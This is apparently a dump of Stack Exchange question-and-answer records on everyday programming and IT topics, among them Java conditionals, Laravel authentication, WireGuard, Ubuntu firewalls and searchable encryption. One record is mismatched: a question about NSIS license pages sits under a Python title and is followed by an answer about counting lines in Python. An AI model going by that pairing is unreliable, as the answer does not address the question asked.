java code to connect to a peer and just query it for a value .i have started the network docker container for first network . 
i want to access the peer image from java and send a query request to query for a value\nComment: an equivalent for peer chaincode query -n mycc -c '{\"Args\":[\"query\",\"a\"]}' -C myc\n","meta":{"source":"stackoverflow","title":"How to query a value from a peer using Hyperledger Fabric SDK java","dup_signals":{}},"subset":"stackexchange"} +{"text":"Notepad++ - Is it possible to use custom fonts?\n\nQuestion: Since I use different languages (Latin and non-Latin ones) in my work and some of them (for example Cyrillic languages) have symbols that look exactly the same as Latin ones, sometimes I get those stupid mistakes which are extremely hard to find when I accidentally use Cyrillic symbol in my code instead of the Latin one.\nFor example, the following variable names (PHP-style) look exactly the same, although half of the characters in the second name are Cyrillic symbols (and thus have different codes):\n<code> $iicuxiphametod vs $\u0456i\u0441u\u0445i\u0440h\u0430m\u0435t\u043ed\n<\/code>\nSo I've come up with idea of using for style configuration those fonts whose Latin and Cyrillic symbols have different appearance. I've found several fonts of that type - SimSun-ExtB, NSimSun, MingLiU-ExtB etc. - but the problem is that I'd like to use a font that I've created myself.\nDoes anybody know which fonts are used in the Notepad++? Are they it's own fonts or system fonts and is it possible to use different (non-system, user-created) font in Notepad++ (Settings->Style Configurator->Font Style) or just to edit existing one?\nComment: the list of font names you see in Style Configurator are system fonts (fonts that are installed to your OS). Why don't you install your user-created font to your OS?\nComment: When I check my font-lists under the Style-Configurator I get all of everything on my computer. Have you tried installing new fonts to test it, yet?\nComment: Thanks for your comments. No, I haven't tried it yet. I have to create my font first. I was just checking if that's possible.\nComment: since this particular question is already answered it would be nice if you could choose an answer as solution. thanks.\nAnswer: Settings -> Style Configurator...\nselect: Global Styles and Default Style\nat Font Style you can then select the default font wich is (in windows) in the systems font directory.\nAnswer: Its been a while since I've touched my Windows machine and with it Notepad++ but, from what memory I have of that time, when using notepad++ you should be able to change the font under settings\/preferences somewhere, and so long as your font is a valid font-set ie TTF or other supported format, all you have to do or should have to do is have it installed in your Windows font directory, and then in those settings\/prefs choose that font you created.\nComment: I'd kill for a version of TextWrangler on Windows\n","meta":{"source":"stackoverflow","title":"Notepad++ - Is it possible to use custom fonts?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to fix 'duplicate key issue of mongodb' after the version upgrade of other dependent projects in pom.xml\n\nQuestion: I updated the version of the dependent project to the newer one in my project. Now the tomcat doesn't start itself.\nIt is a spring boot application. I updated the version of the dependent project to the newer one in my project. Now when I run from embedded tomcat from eclipse, it works fine. 
But when I copy-paste the WAR into the webapps folder of Tomcat, it doesn't start from Tomcat.\nActual: Application starts from Eclipse and not from Tomcat.\nExpected: Application should start from both Tomcat and Eclipse.\nAnswer: When we open the dependency hierarchy in pom.xml, we see some duplicate jars. Eclipse takes care of the conflicting jars, though Tomcat is not able to. So I checked which version of the jar was actually used in Eclipse, kept only that one, and excluded or commented out the other conflicting mongo dependency. And it worked.\n","meta":{"source":"stackoverflow","title":"How to fix 'duplicate key issue of mongodb' after the version upgrade of other dependent projects in pom.xml","dup_signals":{}},"subset":"stackexchange"} +{"text":"NSIS license page\n\nQuestion: Is there any way you could resize the rich textbox in the license page of an NSIS installer? 
The files are pretty big (approximately 250mb of text).\nComment: Hello and welcome to StackOverflow. Please take some time to read the help page, especially the sections named \"What topics can I ask about here?\" and \"What types of questions should I avoid asking?\". And more importantly, please read the Stack Overflow question checklist. You might also want to learn about Minimal, Complete, and Verifiable Examples\nComment: Some general advice: Don't worry about the efficiency until you have something that works.\nAnswer: Load the file and read it line by line, incrementing occurrences.\n<code># Returns how many times s_string shows up in doc\ndef search_for( s_string, doc):\n count = 0\n with open(doc) as rfile:\n for line in rfile:\n if(line.find(s_string) > -1):\n count = count + 1\n return count\n<\/code>\nComment: I'm sure this has been asked before but here is a function that will get it done.\n","meta":{"source":"stackoverflow","title":"Big text files in python","dup_signals":{}},"subset":"stackexchange"} +{"text":"Laravel - Multi domain using single login server?\n\nQuestion: I'm setting up around 4 <code>Laravel 5.3<\/code> based apps at the moment, they are all part of one \"ecosystem\".\nI plan to use a central <code>Laravel<\/code> app that will handle any user signup, user login and also hold all user details. These details will be used across the 4 separate Laravel web apps. I may also use these user details inside mobile apps in the future so I assume i'll need some sort of JWT based system to control this.\nI've thought about using <code>Laravel Passport<\/code> to achieve this but I don't think this will work for this scenario. In all honesty, the documentation is not clear to me whether this is the sort of system it is designed for or if I need to use a different oAuth2 system. My understanding is it is for API authentication only, or am I wrong?\nAll my other Laravel apps will be on different servers so I can't share the database unfortunately. I need to implement a cross domain solution it seems.\nThanks in advance for any info on this, just to clarify that I am not asking you to code the script for me, simply to help point me in the right direction on how to do this properly - can't really show code on something I don't know!\nI believe I have explained everything that I am trying to achieve here, and I have already done research but nothing seems to be clicking in my brain.\nComment: Why the downvote? I've done research, presented my findings and asking for help... Could at least leave a reason, *sigh*\nComment: @Epodax I'm not sure how it's so broad? Passport allows for OAUTH2 server to be set up, which sounds like the right thing to do, however I don't believe it suits this project as my users will use a web app primarily, and then mobile apps later on down the line.\n\nSo my question is basically asking if there is a good way to utilise a central laravel app that contains all the users (the main site) and have the other servers speak to that to get the user data\nAnswer: I think it depends on your business logic. 
Below is what i'm thinking:\n\nIf what you mean <code>Multi Domains<\/code> is the sub domains (as you mentioned <code>login.site.com<\/code>), i think the simplest way is to use <code>site.com<\/code> wide cookie with redis\/memcached as the session storage solution.\nIf they do have different domain names, and beyond the central site, user when visit site A also want site B feature (or content, those sites are closely connected), i thought the JWT solution is the better choice.\nAny other cases, choose OAuth\n\nWell, maybe others have better ideas.\nComment: That's a good answer and makes sense. It's likely that I will have one central site like this `maincompany.com` where user data, user sign up and user register will be handed, and then the multi apps that are part of this umbrella are separate servers\/domains like `app1.com`, `app2.com` and `app3.com` all hosted on different Laravel Forge deployed servers. Looks like I'll probably go with option 2, at least until i've explored `Passport`'s complete capabilities :)\n","meta":{"source":"stackoverflow","title":"Laravel - Multi domain using single login server?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Differentt style if it's OS \/ iphone\n\nQuestion: I have a problem in rendering my fonts in iphone, or ipad, this is my proposal by JS, does'nt work ?\n<code>var iOS = \/iPad|iPhone|iPod\/.test(navigator.userAgent) && !window.MSStream;\nvar x = document.getElementsByTagName(\"h1\");\nvar i;\n\nif (iOS) {\n for (i = 0; i < x.length; i++) {\n x[i].style.letterSpacing = \"0px!important\";\n}\n}\nelse { \n for (i = 0; i < x.length; i++) {\n x[i].style.letterSpacing = \"2px!important\";\n} \n}\n<\/code>\nAnswer: I believe the issue is because you need a space in between the sizing and the '!important' attribute.\nThis:\n<code>x[i].style.letterSpacing = \"2px!important\"\n<\/code>\nbecomes\n<code>x[i].style.letterSpacing = \"2px !important\"\n<\/code>\nOn another point, I'd recommend declaring 'i' in the for loop, unless you specifically need it later on. Also, I'd recommend keeping your code tidy, even in development, and especially when asking others for help, as you have a couple indentation problems.\n","meta":{"source":"stackoverflow","title":"Differentt style if it's OS \/ iphone","dup_signals":{}},"subset":"stackexchange"} +{"text":"Serving local HTTP over VPN\n\nQuestion: I'm running a server on my LAN.\nIt's setup as a Webserver that's only listening to local connections and a WireGuard VPN server.\nWhen I'm not at home, I establish a connection to the vpn.\nThe webserver is using http only. I've set up an nftables rule that masquerades requests from my vpn ip to my webserver in order to access those pages.\nWireGuard is left with default settings, so it just establishes a connection between server and client.\nSince I'm entering sensitive information on these websites, I'm wondering if the connection is encrypted through the vpn tunnel or if https is necessary to be on the safe side.\nMy LAN is trustworthy. VPN server and webserver are running on the same machine.\nComment: You are not serving local HTTP over VPN, according to the details you provide. Can you clarify this point?\nComment: Can you explain \"I do not route all traffic through that VPN, only DNS requests.\"\nComment: I'm beginning to think that the answer is: it depends on how you set it up. All we are doing is asking for details on how you set it up. 
Please provide the full details.\nComment: Again, this line \"The vpn is not set to route all traffic through the tunnel.\" is the crucial one that you need to explain. What ***is*** sent through the tunnel?\nAnswer: You question isn't very clear. You wrote:\n\nI'm connecting to that server via VPN (wireguard).\n\nAnd after:\n\nI do not route all traffic through that VPN, only DNS requests.\n\nSo, if the HTTP stream between your client and your server isn't routed throught VPN, then the connection isn't encrypted.\nAt contrary, if you route the traffic to your HTTP server throught the VPN, then it's encrypted.\nNevertheless, keep in mind that traffic between your VPN gateway and your HTTP server will remain clear.\nComment: That's my question. When I connect to a Webserver that's only accessible through that VPN, is that connection encrypted by the vpn? The Webserver that's hosting the websites is also the VPN gateway\nComment: @Unkn0wn accessed through VPN == encrypted by the VPN if the VPN encrypts its traffic.\n","meta":{"source":"security.stackexchange","title":"Serving local HTTP over VPN","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to compare three boolean values\n\nQuestion: Compare three boolean values and display the first one that is true.\nHey guys, I am trying to write a program that compares three boolean values and displays the first true one. I am comparing three words for their length, and it will display the longest. The error that I am getting is that my else tags aren't working. Take a look at the code.\n<code>\/\/Check which word is bigger\n if (len1 > len2)\n word1bt2 = true;\n\n if (len2 > len3)\n word2bt3 = true;\n\n if (len1 > len3)\n word1bt3 = true;\n\n \/\/Check which word is the longest\n if (word1bt2 == true && word1bt3 == true);\n System.out.println(wor1);\n else if (word2bt3 == true);\n System.out.println(wor2);\n else System.out.println(wor3);\n<\/code>\nI have set boolean values for word1bt2, word2bt3 and word1bt3. In eclipse, I am getting a syntax error under the elses in my code above. Any help would be great!\nComment: `else tags ` What is an else tag?\nComment: you need to add if after 1st else\nif(cond){\n... code ...} else if (cond2 ){... code ...} else {... code ...}\n\nAlso you need to fix your semicolons.\nComment: Here you should find good answer: [link](http:\/\/stackoverflow.com\/questions\/4982210\/find-the-max-of-3-numbers-in-java-with-different-data-types-basic-java)\nComment: And *please* don't write `if(xyz==true)`. Just write `if(xyz)`. There's no point in comparing booleans with `true`. You wouldn't write `if((len1 > len2) == true)`, would you?\nAnswer: <code>if (word1bt2 == true && word1bt3 == true);\n<\/code>\nIs wrong, you need to remove the semicolon:\n<code>if (word1bt2 == true && word1bt3 == true)\n<\/code>\nSame for the <code>else<\/code>s\n\n<code>else (word2bt3 == true);\n<\/code>\nIs wrong too, it should be\n<code>else if (word2bt3 == true)\n<\/code>\n\nSide note: boolean values can be used as condition, so your <code>if<\/code> statements should be\n<code>if (word1bt2 && word1bt3) \/\/ The same as if (word1bt2 == true && word1bt3 == true)\n<\/code>\nComment: Yeah, I caught the `else if` myself in the post. Didn't copy-paste. Thanks, I am new to Java so this site is great for me.\nComment: `if(bool1 && bool2)` should be used. 
Expressions such as `bool == true` are frowned upon\nComment: @rocketboy Completely forgot that, I updated the answer, thanks!\nAnswer: \nHow to compare three boolean values?\n\nDon't!\nIf you find yourself needing to compare three variables you may as well cater for any number of variables immediately - there's no point hanging around - do it properly straight away.\n<code>public String longest(Iterator<String> i) {\n \/\/ Walk the iterator.\n String longest = i.hasNext() ? i.next() : null;\n while (i.hasNext()) {\n String next = i.next();\n if (next.length() > longest.length()) {\n longest = next;\n }\n }\n return longest;\n}\n\npublic String longest(Iterable<String> i) {\n \/\/ Walk the iterator.\n return longest(i.iterator());\n}\n\npublic String longest(String... ss) {\n \/\/ Wrap the array in a List so the Iterable overload is used (calling longest(ss) directly would recurse forever).\n return longest(java.util.Arrays.asList(ss));\n}\n<\/code>\nComment: The thing is that I don't understand that at all. I am learning at my own pace in which I want to understand everything that is happening.\nAnswer: Remove the <code>;<\/code> and replace it with brackets <code>{}<\/code>.\n<code>if (word1bt2 && word1bt3) {\n System.out.println(wor1);\n} else if (word2bt3) {\n System.out.println(wor2);\n} else {\n System.out.println(wor3);\n}\n<\/code>\nComment: That's right, but in this case the code is easier to read.\nComment: Brackets aren't needed in that specific case\nComment: Also, the `== true` parts are redundant.\nComment: It's easier to read if you remove all the obsolete `==true` fragments. It's one thing to see them in a beginner's question but another to repeat them in the answer.\nAnswer: Issue with the else blocks: use <code>{}<\/code> instead of <code>()<\/code> to enclose instructions...\nRemove the <code>;<\/code> at the first if!!!!! - Quite a common mistake, with very puzzling results!\n<code>\/\/Check which word is the longest\nif (word1bt2 == true && word1bt3 == true) { \/\/leave out the ; and always add brackets!\n System.out.println(wor1);\n}\nelse if(word2bt3 == true)\n{\n System.out.println(wor2);\n}\nelse {\n System.out.println(wor3);\n} \n<\/code>\n\nIf you need a condition in an else branch, you have to use if again - plain else won't have such a feature...\nALWAYS use brackets for bodies of if statements, loops, etc!!!\nBe extremely careful NOT to use ; in the lines that don't behave well with it:\n\nif statements\nfor loops\nwhile() {...} loops' while statement\nAnswer: Try this: if the lengths are equal then s1 is considered the bigger one. 
Also i have not added null check\n<code> public class Test {\n public static void main(String[] args) {\n\n String word1 = \"hi\";\n String word2 = \"Hello\";\n String word3 = \"Hell\";\n String Bigger = null;\n if(word1.length() >= word2.length() && word1.length() >= word3.length() ){\n Bigger = word1;\n }else if(word2.length() >= word1.length() && word2.length() >= word3.length()){\n Bigger = word2;\n }else if(word3.length() >= word2.length() && word3.length() >= word1.length()){\n Bigger = word3;\n }\n System.out.println(Bigger);\n\n }\n\n }\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to compare three boolean values","dup_signals":{}},"subset":"stackexchange"} +{"text":"Describing and comparing illustrations: is it a fit for the site?\n\nQuestion: I was wondering if someone with little knowledge of the fundamentals of graphic design could ask a question along the lines of:\nCan the technique used in this drawing(ink pen) from a professional artist be briefly summarized\/categorized and is it similar to what is seen in this other work?(showing details for both)\n\nIs it about illustration, or more generally, is it within the scope of the site?\nIs it interesting for the community on the site?\nIf not, do you know of an SE asset where this works?\nComment: Thank you for the answers!\nAnswer: It's not \"My Adobe isn't working\" so I say.. yes... it's on topic and will at least break up the monotony of those wanting help with software.\nComment: I use Gimp anyway ;)\nAnswer: I think it is \u2013 with good examples, I think these kind of questions would be quite interesting. It might be about placing visuals in historical, artistic context and I for one would like to see more questions about the bigger picture of what we do.\nComment: Admittedly I know nothing about the history of art but I think the first thing I can do is to properly identify(attribute) the time where the work was created and read a bit about the artist.\nAnswer: I would just make the question and tag it style-identification and illustration. If we don't like it we'll remove it.\nMy worry is to not have style-identification become as horrendous as font-identification. If the question is even remotely similar to a typical font-id question (no effort on your part) then I'll be the first to down-vote and close-vote it.\nComment: I've taken a look at the font-identification content and I understand. I don't think it would be like that. What I'm trying to avoid on the contrary is too wide a scope and\/or too many subquestions...\n","meta":{"source":"graphicdesign.meta.stackexchange","title":"Describing and comparing illustrations: is it a fit for the site?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Database design for optional fields\n\nQuestion: I've got 3 tables:\n\norders\nline_items\nproducts\n\nThey're setup as: \n\norder has many products through line_items\n\nThis allows me to store in line_items such things as the product_id, quantity, price at time of purchase, discount, etc...\nAll is well up to this point.\nWhat I'm looking to achieve:\nI now need to have some products that have a user changeable status. Meaning that at some point in the future after an order has been processed, the purchased product status can be changed from one status to another.\nThe product table has a statusable boolean field that tracks whether said product supports a status.\nThe question:\nWould I just add a status field in line_items? 
Only a small amount of the products will require a status so it feels like a waste but I'm not sure how else to approach this hurdle. My main concern being that I'll end up with a massive table as the application grows and specific products require extra optional fields.\nComment: Your `order` and `line_item` records should be *immutable*, in *append-only tables*, as should the copies of *product* for the orders. So if you must change something after the fact, I'd put it in separate table like `product_status` that you can insert status rows into at order creation time for products that can have a status. Make that table updateable so you can update the status and *only* the status later. It should be impossible for users to edit any other part of the order after the fact - they should have to *append* amendments instead.\nComment: @Vasseurth Well, you could use database column-level permissions to grant `INSERT` on all `order` columns but only grant `UPDATE` on the `state` column, I guess. Personally I'd use a side-table so I could keep `orders` append-only, but that's a design preference. Either way you should make sure no other columns can be changed.\nComment: Rationale: The order is a record of something that happened, not live state. So it should be immutable. Mistakes should be corrected with journaled amendments.\nComment: Thanks @CraigRinger for the explanation, would you mind answering this corollary. If an order has a state (i.e. shipped), should that not be a field in the orders table?\nComment: Totally agree @CraigRinger. To be clear, you're suggesting a simple table for each post-purchase configurable product option and programmatically assigning the line_item.id to the option?\nComment: @Vasseurth I'd also say to be careful with putting the shipped state on the order. Especially if you support partial shipping, in that case you'd want to manage it at the line item level.\nComment: Well, I hardly know what the actual data model and real needs are, so all I can do is make very broad comments. It *sounds* like a `product_status (order_id integer, product_id integer, primary key(order_id, product_id), status whatevertype)` table would be appropriate, but it's hard to know w\/o a real analysis of the problem with full details. Also, Rails is probably going to explode and die if you do anything like actually use database features like composite keys and column permissions.\nAnswer: There are two options for this:\n\nCreate a column in the join model\nCreate a separate \"statuses\" table, which you can use to create specific status updates\n\n--\nAttribute\nI would personally create a column in the join model to support a <code>status<\/code>. 
Yes, it will require you to have that column for every <code>line_item<\/code>, but it will make the process much simpler, and will give extensibility without massive issues.\nYou'll be best using one of the state machine gems (<code>state_machine<\/code>, <code>aasm_state<\/code>) to provide:\n<code>#app\/models\/line_item.rb\nclass LineItem < ActiveRecord::Base\n include AASM\n\n aasm do\n state :active, :initial => true\n state :inactive\n\n event :activate do\n transitions :from => :inactive, :to => :active\n end\n\n event :deactivate do\n transitions :from => :active, :to => :inactive\n end\n end\nend\n<\/code>\nThis will give you the ability to directly affect the status of the <code>line_item<\/code> model.\n--\nAssociated Model\nAlternatively, you may want to create a different table \/ model:\n<code>#app\/models\/line_item_status.rb\nclass Status < ActiveRecord::Base\n #field id | line_item_id | status | created_at | updated_at\n belongs_to :line_item\nend\n\n#app\/models\/line_item.rb\nclass LineItem < ActiveRecord::Base\n has_one :status\n delegate :status, to: :status #-> allows you to call @line_item.status\nend\n<\/code>\nThis will give you the ability to set the status for each product, making your data tables more efficient by only including a single <code>status<\/code> for each <code>line_item<\/code>.\nComment: Thanks @RichPeck, how would you deal with the addition of other post-purchase mutable properties? For example, some products have a state which your solution addresses, but looking into the future other products may require different properties, such as some products being redeemable and so on... Feels like there'd be a better way to manage that instead of creating an associated model for each new mutable product property. Hope that makes sense.\n","meta":{"source":"stackoverflow","title":"Database design for optional fields","dup_signals":{}},"subset":"stackexchange"} +{"text":"Restricting Internet access of applications in Ubuntu\n\nQuestion: I want to block access to the Internet for all apps and processes on my machine except for ones specifically allowed. I used to achieve this with a firewall when I was using Windows. I have a very tight data plan (3rd world country problems) so I have to watch which apps use the Internet. How can I achieve this in Ubuntu 16.04 LTS? \nEdit: Most of the answers I found here are either about blocking certain sites or blocking a certain app rather than blocking the entire app list and allowing only a handful of apps. \nAnswer: This might not be as easy as you might want; firewalls can be a tricky topic. A widely used Linux firewall is 'ufw'; it is part of the standard install. There is a graphical interface called 'gufw' which has an easy setting mode for getting started quickly, but also allows you to fine-tune rules in the graphical application. \nJust install it with the line\n<code>sudo apt install gufw\n<\/code>\nHowever, please note that all Linux firewalls I am aware of are based on ports, not on applications. Actually the firewall only sees network traffic going in or going out, but it cannot tell which application sent that traffic. All applications send their traffic to a certain port, e.g. port 80 for standard HTTP traffic. You can fine-tune what happens to your traffic based on ports, and it can get complicated very quickly (for example with FTP), but you cannot say, for example, that Firefox can send traffic on port 80 but Chrome cannot. I do not know how the Windows firewall does it, or whether it only seems to do that. 
I just know that the dialog there gives a list of applications. \nSo if you can work out your problem based on the ports that your applications use, you have all the flexibility you need. What I like about the gufw tool is that it has a rather safe quick setup mode that is quite useful to quickly lock up a mobile computer completely when using a public hotspot and just open a single hole for a specific port only.\nHope it helps. \nComment: Neither iptables nor ufw\/gufw will filter by application. You can use iptables to filter by process owner.\nComment: It's odd that Linux uses a port-based firewall. I don't know much about this stuff but based on your explanations, I think I can't block specific apps but rather services\/protocols, right? For example I can stop all HTTP by blocking port 80. Am I right?\nComment: You are right. There is a way, as bodhi.zazen points out, via the PID. The firewall could find out the PID, and as each running app has a unique PID there could be a lookup of process information for that PID. But that's a very advanced firewall setup and programming. And adding complexity like that into a firewall is usually a way to decrease security, not to increase it. For a non-expert in firewall internals it's probably way out of reach. I think you will find that you already come a long way towards your target by using what ufw has to offer.\nComment: @the downvoter. I always think it's quite unfair to downvote an answer without telling why. I cannot see what is wrong with it, please advise.\nComment: You cannot filter by PID.\nComment: Thanks for the info. I did not mean filtering directly, but more working it out at a low level in the iptables definitions. I am quite sure it did work, because I had intended to achieve the same as the OP when coming from Windows, but it seems nightmarish and very cumbersome to solve. I would have to look up the details again. Anyway, not a good thing to do, still\nComment: @CatMan filtering by PID, if possible, would be tedious since I'll have to change the PID every time I reopen the process.\nComment: @tamrat - No, iptables will not filter by PID. See http:\/\/www.spinics.net\/lists\/netfilter\/msg49716.html\nComment: OK, I have looked quite a lot into this. And I think I figured out why there aren't a lot of such apps around. I connected my machine to the Internet via my phone's cellular hotspot and noticed something beautiful under the Resources tab in System Monitor. There aren't any applications that use the Internet, because the received and sent bytes stay constant. I am not sure, but it appears that Ubuntu doesn't use a lot of background data.\nComment: Hey, that is great. Just to be on the safe side I would still recommend you install the firewall and open the ports you expect to need.\n","meta":{"source":"askubuntu","title":"Restricting Internet access of applications in Ubuntu","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to arrange images in a hierarchical structure?\n\nQuestion: Something like this picture\n\nI've tried to use <code>ImageCollage<\/code> with different weights and other conditions, but all of them arrange pictures arbitrarily. For instance\n<code>ImageCollage[{4 -> im0, 1 -> im1, 1 -> im2}, Background -> None] \n<\/code>\norganizes the images horizontally:\n\nand so on.\nComment: closely related \/ possible duplicate : [Spanning\/centering elements with Grid\/GraphicsGrid when there's a non-equal number of elem. 
in rows](https:\/\/mathematica.stackexchange.com\/q\/65211\/125)\nAnswer: <code> SeedRandom@2;\n p = Table[BarChart[RandomReal[1, 5]], 7];\n\nGrid[{{p[[1]], SpanFromLeft}, {p[[2]], SpanFromLeft, p[[3]], \n SpanFromLeft}, Join @@ {p[[4 ;; 7]]}}, Frame -> All, \n Alignment -> Center]\n<\/code>\nAnswer: <code>Module[{pl, w = 500, h = 100},\n pl[frac_] := Framed[\n BarChart[\n RandomReal[1, 5]\n , AspectRatio -> frac h\/w\n , PlotTheme -> \"Scientific\"\n , ImageSize -> 0.9 {w\/frac, h}\n ], ImageSize -> {w\/frac, h}];\n GraphicsGrid[\n {\n PadRight[{pl[1]}, 4, SpanFromLeft],\n {pl[2], SpanFromLeft, pl[2], SpanFromLeft},\n {pl[4], pl[4], pl[4], pl[4]}\n }\n , ImageSize -> {w, 4 h}\n , Spacings -> {0, 0}\n ]]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"How to arrange images in a hierarchical structure?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to require namespace inside function -main?\n\nQuestion: Suppose that in Leiningen project yo, I have these files:\nfoo.clj:\n<code>(ns yo.foo)\n(def x 234.5)\n<\/code>\nbar.clj:\n<code>(ns yo.bar)\n(def x -15)\n<\/code>\nAnd I have a main file (core.clj):\n<code>(ns yo.core)\n(require '[yo.foo :as f])\n(when (= f\/x 234.5) (println \"Succesfully required foo.\"))\n(defn -main [& args]\n (println (require '[yo.bar :as b]))\n ;(when (= b\/x -15) (println \"Succesfully required bar.\"))\n )\n<\/code>\nWhen I enter \"lein run\" on the command line, I get this output:\n<code>Succesfully required foo.\nnil\n<\/code>\nThe first line tells me that I understand how to use the <code>require<\/code> function at the top level of a file. (Normally I would use <code>:require<\/code> in the <code>ns<\/code> statement.) The second line seems to indicate that I successfully required <code>yo.bar<\/code>.\nHowever, when I uncomment the line containing <code>when<\/code> in <code>-main<\/code>, I get an exception:\n<code>java.lang.RuntimeException: No such namespace: b, compiling:(yo\/core.clj:6:9)<\/code>.\nIs there a way to perform a require from inside a function? My goal is to pass the name of a namespace on the command line, and have that namespace loaded as a result. Is there another way to do this? (I already know how to access command line arguments from within <code>-main<\/code>.)\n(The problem is not that I wrapped the <code>require<\/code> call with <code>println<\/code>. I get the same exception if the first line of <code>-main<\/code> says only <code>(require '[yo.bar :as b])<\/code>.)\n(The title of this question makes it seem as if it's the same as mine, but the question and the answer don't address the problem of requiring a namespace from inside a function.)\nAnswer: The <code>require<\/code> statement within the function <code>-main<\/code> is not invoked during compilation. Thus the compiler can't resolve the namespace <code>b<\/code> and complains.\nComment: I see. i.e. the `require` does fire at runtime, but by then it's too late. Thanks Leon. This makes it sound as if there is no way to use namespaces that are chosen at runtime, except by explicitly calling the compiler or by throwing source code into a repl at runtime, or maybe using `load-file`. But I guess could use the method described in the question I linked to. That gets the namespace dynamically, but from the environment rather than by parsing command line arguments. 
If I wanted to pass the namespace on the command line, I could call `lein` from a shell script that sets an env var.\nComment: It turns out that I can pass code from the command line to `load-string` and have the newly loaded namespace recognized--which is what I wanted to do in the first place. Since `load-string` also causes compilation at runtime, the fact that the namespace is compiled then as well is not a problem.\nComment: How is `(require ...)` invoked during compilation when it is a top-level statement?\nComment: @HappyFace Compilation effects to invoking all top level forms\n","meta":{"source":"stackoverflow","title":"How to require namespace inside function -main?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Searching over encrypted data\n\nQuestion: Is there any library\/tool available which can allow me to search over encrypted data? \nI would like to encrypt data on client side, send it to cloud and perform search in cloud. \nI've been reading about homomorphic encryption and though there is CryptDb available which makes it possible to run encrypted DB in cloud, but my use case is slightly different- in my case I want to let users send me encrypted data and I want to be able to do a keyword search (as opposed to user performing search). \nComment: Can you be more specific with your requirement ? If users send the encrypted data to you , are you some kind of proxy ? will you know the search terms in plain text ?\nComment: See a related question: http:\/\/crypto.stackexchange.com\/questions\/3446\/is-it-possible-to-match-encrypted-documents-using-user-defined-search-terms\nComment: @sashank I may or may not know search terms. Ideally not, but I am okay with a design if I will be required to receive keywords in plaintext\nComment: This is a duplicate of [Is it possible to match encrypted documents using user-defined search terms?](http:\/\/crypto.stackexchange.com\/q\/3446\/351). There are rich variety of techniques for solving this problem. See my answer there for an entry-point into the literature.\nAnswer: I don't think there is an existing library that can satisfy your needs.\nHomomorphic encryption is powerful and requires lots of computations. However, in your case which allows user-defined keywords, I suggest you to take a look at Searchable Encryption. \nSearchable Encryption is the algorithm that should be of interest. It allows cloud server to search 'blindly' on client's encrypted data, based on a 'trapdoor' - a token that contains keywords to be searched for - sent by the client. Of course, client must also encrypt the keywords along the encrypted data before uploading them, which will surely increase the overhead. For 'blindly' it means the cloud server doesn't acquire any unnecessary knowledge about the searched keywords and the encrypted data, during the entire query process. \nSome of the searchable encryption algorithms are based on pairing-based cryptography. In that case, you can build your application based on PBC library.\nAnswer: Take a look at the SSARES system. According to the abstract,\n\nOur solution encrypts email (the headers, body, and attachments) as it arrives on the server using public\u2013key encryption. SSARES uses a combination of Identity Based Encryption and Bloom Filters to create a searchable index.\nThis index reveals little information about search keywords and queries, even against adversaries that compromise the server. 
SSARES remains largely transpar-\nent to both the sender and recipient.\nComment: Hello insane and welcome to Crypto.SE. I've edited your answer because the previous link didn't lead to the PDF directly. I've also quoted a few paragraphs from the abstract. This IMO makes for some better content overall. If you feel I've overstepped, you can always roll back to the original, but please quote me in a comment so I know what could have been done better. Cheers\nComment: Your edit is \"fine\". The thing is, that I already used the implementation and would actually recommend to ask the author for the code. That got lost.\nAnswer: In your requirement , \n\nif the users trust you , they may share their key's as well with you to perform search operations on their behalf and you act as proxy to send the queries and receive results \nIf the users don't trust you, then you would just be a relay agent for the cloud , instead users can search directly over the cloud to reduce the latency.\n\nApart from the search over encryption links suggested above in the comments, you may \nwant to look at CP-ABE schemes as well , Cipher Text Policy Attribute Based Encryption library.\n","meta":{"source":"crypto.stackexchange","title":"Searching over encrypted data","dup_signals":{}},"subset":"stackexchange"} +{"text":"why navigator.contacts.create() coming as Cannot call method 'create' of undefined?\n\nQuestion: I am going to save contact number in device using phone gap build. I have written below logic. build the apk file from phone gap build website. when invoke below function getting error in line navigator.contacts.create(); contacts.create undefined. Is any thing i missed in code or what?. Anybody help me. great appreciate. Thank you.\n<code>\/\/ create a new contact object\n var contact = navigator.contacts.create();\n contact.displayName = conatctName;\n\n\/\/ save First and Last name\nvar name = new ContactName();\nname.givenName = fName;\nname.middleName = mName;\nname.familyName = lName;\ncontact.name = name;\n\n\/\/ save cell-phone and office-phone\nvar phoneNumbers = [];\nphoneNumbers[0] = new ContactField('work', workNum, false); \nphoneNumbers[1] = new ContactField('mobile', mobileNum, true);\n\ncontact.phoneNumbers = phoneNumbers;\ncontact.save();\nalert(\"Contact Saved\"); \n<\/code>\nComment: have you wrapped the code in device ready ???\nComment: ya, after device ready only. i am calling. This function feature is after navigation tow screens. but is is not working.\nComment: which version of cordova and have u added the permission in androidmanifest file ?\nComment: I don't have any androidmanifest file. i have done code in HTML5 using NetBeans developer IDE. I have zip entire project and uploaded in to build phone gap website. Within project i have config.xml file. Thank you.\nAnswer: Check your config.xml file (or post it).\n<code><plugin name=\"Contacts\" value=\"org.apache.cordova.ContactManager\" \/>\n<\/code>\nComment: I have added these feature and plugin. but not working same error.\n","meta":{"source":"stackoverflow","title":"why navigator.contacts.create() coming as Cannot call method 'create' of undefined?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why do I receive ACTION_ACL_DISCONNECTED after pairing\n\nQuestion: For Android, I've written some code with a service that upon execution, the service looks for my BT device and calls device.createRfcommSocketToServiceRecord for paired devices that it finds (right now, only one). 
